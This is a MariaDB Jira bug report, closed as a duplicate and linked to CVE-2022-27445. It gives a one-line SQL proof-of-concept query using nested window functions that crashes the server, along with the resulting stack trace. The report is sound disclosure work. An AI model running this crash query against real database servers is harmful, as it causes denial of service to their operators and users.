[MDEV-28081] MariaDB SEGV issue - Jira

XML

Word

Printable

Details

Type: Bug
Status: Closed (View Workflow)
Priority: Major
Resolution: Duplicate
Affects Version/s: 10.9.0
Fix Version/s: N/A
Component/s: Optimizer - Window functions
Labels:
None
Environment:
Linux jie-2 5.4.143-1-pve #1 SMP PVE 5.4.143-1 (Tue, 28 Sep 2021 09:10:37 +0200) x86_64 x86_64 x86_64 GNU/Linux

Description

PoC:

SELECT AVG ( - NULL ) OVER ( PARTITION BY 'x' / 17709244.000000 ) / + AVG ( FALSE ) OVER ( PARTITION BY + ( AVG ( NOT 'x' ) ) ) ;

report:

Thread pointer: 0x7fa804000c58

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack_bottom = 0x7fa8640ebe30 thread_stack 0x49000

mysys/stacktrace.c:212(my_print_stacktrace)[0xe12bae]

sql/signal_handler.cc:226(handle_fatal_signal)[0x973f04]

sigaction.c:0(__restore_rt)[0x7fa8676a23c0]

sql/sql_window.cc:435(compare_order_elements(st_order*, st_order*))[0x8e4131]

sql/sql_window.cc:588(compare_window_funcs_by_window_specs(Item_window_func*, Item_window_func*, void*))[0x8e395c]

??:0(JOIN::make_aggr_tables_info())[0x799500]

??:0(JOIN::optimize_stage2())[0x78afdb]

sql/sql_select.cc:2492(JOIN::optimize_inner())[0x7922a2]

??:0(JOIN::optimize())[0x78af00]

sql/sql_select.cc:4993(mysql_select(THD*, TABLE_LIST*, List<Item>&, Item*, unsigned int, st_order*, st_order*, Item*, st_order*, unsigned long long, select_result*, st_select_lex_unit*, st_

select_lex*))[0x785468]

sql/sql_select.cc:543(handle_select(THD*, LEX*, select_result*, unsigned long))[0x785330]

sql/sql_parse.cc:6252(execute_sqlcom_select(THD*, TABLE_LIST*))[0x754fea]

??:0(mysql_execute_command(THD*, bool))[0x74ef77]

sql/sql_class.h:2734(THD::enter_stage(PSI_stage_info_v1 const*, char const*, char const*, unsigned int))[0x74b207]

sql/sql_parse.cc:1896(dispatch_command(enum_server_command, THD*, char*, unsigned int, bool))[0x7490c7]

sql/sql_parse.cc:1404(do_command(THD*, bool))[0x74b65e]

sql/sql_connect.cc:1418(do_handle_one_connection(CONNECT*, bool))[0x85bf2e]

sql/sql_connect.cc:1318(handle_one_connection)[0x85bd4d]

perfschema/pfs.cc:2203(pfs_spawn_thread)[0xb8496e]

nptl/pthread_create.c:478(start_thread)[0x7fa867696609]

??:0(clone)[0x7fa8673b6163]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x7fa804010b40): SELECT AVG ( - NULL ) OVER ( PARTITION BY 'x' / 17709244.000000 ) / + AVG ( FALSE ) OVER ( PARTITION BY + ( AVG ( NOT 'x' ) ) )

Attachments

Issue Links

duplicates

MDEV-19398 Assertion `item1->type() == Item::FIELD_ITEM && item2->type() == Item::FIELD_ITEM' failed in compare_order_elements

Closed

links to

CVE-2022-27445

Activity

People

Assignee:: Unassigned

Reporter:: Jingzhou Fu

Votes:: 0 Vote for this issue

Watchers:: 3 Start watching this issue

Dates

Created:: 2022-03-16 09:17

Updated:: 2022-04-27 16:06

Resolved:: 2022-03-18 13:50

Git Integration

Error rendering 'com.xiplink.jira.git.jira_git_plugin:git-issue-webpanel'. Please contact your Jira administrators.